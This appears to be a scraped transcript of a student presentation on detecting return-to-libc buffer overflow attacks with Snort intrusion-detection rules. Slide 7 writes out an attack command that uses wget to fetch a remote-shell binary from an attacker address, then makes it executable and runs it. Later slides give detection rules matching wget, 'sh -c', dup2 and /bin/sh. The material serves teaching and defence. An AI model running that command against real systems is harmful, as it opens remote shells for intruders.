Presentation is loading. Please wait.

Presentation is loading. Please wait.

Detecting Return-to-libc Buffer Overflow Attacks Using Network Intrusion Detection Systems Presented By: Ankush Jindal(2009CS50234) Jatin Kumar(2009CS50243)

Published byMalia Gardener Modified over 9 years ago

Similar presentations

Presentation on theme: "Detecting Return-to-libc Buffer Overflow Attacks Using Network Intrusion Detection Systems Presented By: Ankush Jindal(2009CS50234) Jatin Kumar(2009CS50243)"— Presentation transcript:

1 Detecting Return-to-libc Buffer Overflow Attacks Using Network Intrusion Detection Systems Presented By: Ankush Jindal(2009CS50234) Jatin Kumar(2009CS50243)

2 Buffer Overflow Attack ‘Buffer overflow’ is famous/infamous hacking technique in computer security. Buffer overflow conditions are caused by missed boundary checks of user-supplied data.

3 Smashing The Stack Give application a very long string with malicious code. The string length, being much larger than the space allocated in the stack. The return address now points to the beginning of the malicious code

4 Protection Against Buffer Overflow Attack Network Based Intrusion Detection and Prevention Systems. Host Based Protection Mechanisms. ◦ Stack based buffer overrun detection. ◦ Safe structured exception handling. ◦ DEP ◦ ASLR

5 Return-to-libc Attack Divert control flow of exploited program into libc code ◦ system(), printf(), No code injection required

6 Simulation of attack

7 Perpetrating the attack Attack: system(sh –c ‘wget 192.168.10.1 /rshell’); chmod +x rshell;./rshell) Requests rshell program Receives rshell program Executes rshell program Attacker has remote shell

8 Detection of Return-to-libc Attack Rule 1: Indicative of remote connection brute force attempt. ◦ alert tcp 192.168.10.3/32 any -> any(msg:“Stack smashing brute force or DOA attack”; flow : to_client, established; flags:R; threshold: type both, track by_dst, count 5, seconds 5; priority: 1; classtype: attempted-user; sid:1234567;) Rule 2: Identify when a “wget” is attempted from the server. ◦ alert tcp 192.168.10.2/32 any -> any(content: "Wget"; msg:"wget request,possible malicious code download attempt";priority: 1;classtype:attempted-user; sid:5234567;)

9 Rule 2: Identify when a “wget” is attempted from the server. ◦ alert tcp 192.168.10.2/32 any -> any any(content: "Wget"; msg:"wget request,possible malicious code download attempt";priority: 1;classtype:attempted-user; sid:5234567;) Rule 3: Identify when “sh –c” is attempted from the server ◦ alert tcp any any -> 192.168.10.2/32 any (flow:to_server,established; content: "sh -c"; msg: "shell command sent from client, possible remoteattack";classtype:attempted-user; sid:3234567;)

10 Rule 3: Looks for a repeated concurrent 4 byte pattern which contains any character other than null byte characters i.e. 0x00. ◦ alert tcp any -> 193.60.151.200/24 80,443,20,25,110,143 (flow:to_server,established; pcre: ([^\x00]{4})\1; msg: "repeated words, possible stack overflow";classtype:attempted-user; sid:9234567; rev:3;)

11 Testing of Rules Streamed over 250MB of data over network to the application along with some attack strings. According to the authors no false positives were detected !! ◦ Really ?? Rules can be fine tuned by combining multiple of these keywords in one rule.

12 Our Work Simulating the attack as shown in the paper. ◦ Writing the network application (for victim server) ◦ Corresponding attack client ◦ Detection of the attack ◦ Testing of false positives Extending this idea to bypass ASLR security

13 References Detecting Return-to-libc Buffer Overflow Attacks Using Network Intrusion Detection Systems by David J Day, Zhengxu Zhao, Minhua Ma in 2010 Fourth International Conference on Digital Society http://en.wikipedia.org/wiki/Obfuscation_(software)

14

15 Rule 5: To detect if payload has “dup2” ◦ alert tcp any any -> 192.168.10.2/32 any(flow:to_client,established;content: "dup2"; msg: "dup2 in string table, possible remote shell attack";classtype:attempted- user; sid:4234567;) Rule 6: To detect if payload has “/bin/sh” ◦ alert tcp any any -> 192.168.10.2/32 any (flow:to_server,established; content:"/bin/sh"; msg: "binsh request, possibleremote shell attack";classtype:attempteduser; sid:2234567;)

Download ppt "Detecting Return-to-libc Buffer Overflow Attacks Using Network Intrusion Detection Systems Presented By: Ankush Jindal(2009CS50234) Jatin Kumar(2009CS50243)"

Similar presentations

Smashing the Stack for Fun and Profit

Smashing the Stack for Fun and Profit
Umut Girit 200535027.  One of the core members of the Internet Protocol Suite, the set of network protocols used for the Internet. With UDP, computer.

Umut Girit  One of the core members of the Internet Protocol Suite, the set of network protocols used for the Internet. With UDP, computer.
Snort: Overview Chris Copeland What is an Intrusion Detection System (IDS)? An intrusion detection system is any system which can identify a network.

Snort: Overview Chris Copeland What is an Intrusion Detection System (IDS)? An intrusion detection system is any system which can identify a network.
By Hiranmayi Pai Neeraj Jain

By Hiranmayi Pai Neeraj Jain
Detecting Evasion Attacks at High Speeds without Reassembly Detecting Evasion Attacks at High Speeds without Reassembly George Varghese J. Andrew Fingerhut.

Detecting Evasion Attacks at High Speeds without Reassembly Detecting Evasion Attacks at High Speeds without Reassembly George Varghese J. Andrew Fingerhut.
CMSC 414 Computer and Network Security Lecture 22 Jonathan Katz.

CMSC 414 Computer and Network Security Lecture 22 Jonathan Katz.
English Shellcode J. Mason, S. Small, F. Monrose, G. MacManus CCS ’09 Presented by: Eugenie Lee EE515/IS523: Security101: Think Like an Adversary.

English Shellcode J. Mason, S. Small, F. Monrose, G. MacManus CCS ’09 Presented by: Eugenie Lee EE515/IS523: Security101: Think Like an Adversary.
Stack-Based Buffer Overflows Attacker – Can take over a system remotely across a network. local malicious users – To elevate their privileges and gain.

Stack-Based Buffer Overflows Attacker – Can take over a system remotely across a network. local malicious users – To elevate their privileges and gain.
Security Protection and Checking in Embedded System Integration Against Buffer Overflow Attacks Zili Shao, Chun Xue, Qingfeng Zhuge, Edwin H.-M. Sha International.

Security Protection and Checking in Embedded System Integration Against Buffer Overflow Attacks Zili Shao, Chun Xue, Qingfeng Zhuge, Edwin H.-M. Sha International.
SSH : The Secure Shell By Rachana Maheswari CS265 Spring 2003.

SSH : The Secure Shell By Rachana Maheswari CS265 Spring 2003.
Andrea Bittau, Adam Belay, Ali Mashtizadeh, David Maziéres, Dan Boneh

Andrea Bittau, Adam Belay, Ali Mashtizadeh, David Maziéres, Dan Boneh
1 Advanced Application and Web Filtering. 2 Common security attacks Finding a way into the network Exploiting software bugs, buffer overflows Denial of.

1 Advanced Application and Web Filtering. 2 Common security attacks Finding a way into the network Exploiting software bugs, buffer overflows Denial of.
Dennis  Application Security Specialist  WhiteHat Security  Full-Time Student  University of Houston – Main Campus ▪ Computer.

Dennis  Application Security Specialist  WhiteHat Security  Full-Time Student  University of Houston – Main Campus ▪ Computer.
CS252: Systems Programming Ninghui Li Final Exam Review.

CS252: Systems Programming Ninghui Li Final Exam Review.
Penetration Testing Security Analysis and Advanced Tools: Snort.

Penetration Testing Security Analysis and Advanced Tools: Snort.
A Statistical Anomaly Detection Technique based on Three Different Network Features Yuji Waizumi Tohoku Univ.

A Statistical Anomaly Detection Technique based on Three Different Network Features Yuji Waizumi Tohoku Univ.
Security Exploiting Overflows. Introduction r See the following link for more info: operating-systems-and-applications-in-

Security Exploiting Overflows. Introduction r See the following link for more info: operating-systems-and-applications-in-
Web Application Access to Databases. Logistics Test 2: May 1 st (24 hours) Extra office hours: Friday 2:30 – 4:00 pm Tuesday May 5 th – you can review.

Web Application Access to Databases. Logistics Test 2: May 1 st (24 hours) Extra office hours: Friday 2:30 – 4:00 pm Tuesday May 5 th – you can review.
TCP/IP Malicious Packet Detection (SQL Injection Detection) Ashok Parchuri.

TCP/IP Malicious Packet Detection (SQL Injection Detection) Ashok Parchuri.
Exploitation: Buffer Overflow, SQL injection, Adobe files Source:

Exploitation: Buffer Overflow, SQL injection, Adobe files Source:

Similar presentations

Ads by Google